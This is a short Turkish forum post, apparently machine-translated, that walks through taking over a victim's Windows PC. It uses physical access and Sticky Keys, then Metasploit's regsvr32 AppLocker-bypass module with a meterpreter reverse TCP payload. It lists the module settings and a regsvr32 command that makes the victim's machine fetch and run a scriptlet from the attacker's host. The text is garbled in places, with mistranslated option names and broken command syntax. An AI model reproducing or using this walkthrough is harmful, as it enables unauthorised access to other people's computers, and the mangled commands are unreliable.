Hoşgeldin Misafir

PC kitleme meta

35izmir

35izmir

🆁🅴🅸🆂🅲🅸🆂🅴🆅🅴🆁
11 Ocak 2018
2,701 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Bugün bir PC'nin nasıl kilitlendiğini, ve kilitli bir ağda nasıl keşfedeceğimizi araştıracağız.

Kurbanımızın PC'sinin zaten aktif bir tuş vuruşu olduğunu varsayalım. Yapışkan tuşlar hakkında daha fazla bilgi için https://en.wikipedia.org/wiki/Sticky_keys adresini ziyaret edin.

Bu saldırı için kurbanın bilgisayarına fiziksel erişime ihtiyacın olacak. Sorunu getirmek için kurbanın bilgisayarındaki "shift" tuşuna 5 defa basın.

Sonra kendi bilgisayarımızda metasploit kullanıyoruz. $ msfconsole

Ardından, yükü bulmak, kullanmak, yüklemek, lhost, lport ve exploit çalıştırmak için

regsvr32_applocker_bypass_server kullanıyoruz.
exploit / windows / misc / regsvr32_applocker_bypass_server kullanın
yük yükleme pencereleri / metre seti / reverse_tcp
Ghost 192.168.0.106 ayarlayın
lport seti 4444


Metasploit tarafından oluşturulan komutu alın ve kurbanın bilgisayarının komut satırında çalıştırın.

Regsvr32 / s / n / u / ?: Http: //192.168.0.106:8080/nKCCncmdb.sct scrobj.dll

Voila, metrik çevirmenimizdeki kurbanın bilgisayarına gidiyoruz.
 
Moderatör tarafında düzenlendi: